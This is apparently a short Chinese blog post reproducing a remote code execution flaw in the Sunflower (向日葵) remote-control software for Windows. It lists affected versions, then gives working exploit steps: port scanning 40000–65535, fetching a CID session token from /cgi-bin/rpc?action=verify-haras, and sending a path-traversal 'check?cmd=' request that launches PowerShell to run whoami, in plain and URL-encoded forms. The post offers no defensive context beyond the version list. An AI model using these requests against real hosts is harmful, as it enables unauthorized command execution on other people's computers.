向日葵rce漏洞复现
向日葵向日葵远程控制是一款提供远程控制服务的软件。向日葵远程控制支持主流操作系统Windows、Linux、Mac、Android、iOS跨平台协同操作,在任何可连入互联网的地点,都可以轻松访问和控制安装了向日葵远程控制客户端的设备影响版本向日葵个人版 for Windows <= 11.0.0.33向日葵简约版 <= V1.0.1.43315(2021.12)漏洞复现PortScan
·
向日葵
向日葵远程控制是一款提供远程控制服务的软件。向日葵远程控制支持主流操作系统Windows、Linux、Mac、Android、iOS跨平台协同操作,在任何可连入互联网的地点,都可以轻松访问和控制安装了向日葵远程控制客户端的设备
影响版本
- 向日葵个人版 for Windows <= 11.0.0.33
- 向日葵简约版 <= V1.0.1.43315(2021.12)
漏洞复现
PortScan探测或其他工具探测40000到65535的开放端口
浏览器访问ip+端口号+ /cgi-bin/rpc?action=verify-haras 获取session值CID 一个一个端口尝试
拿到CID-添加payload和cookie-发送
check?cmd=ping../../../../../../../../../windows/system32/WindowsPowerShell/v1.0/powershell.exe+ whoami
check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+%20whoami
更多推荐
已为社区贡献1条内容
所有评论(0)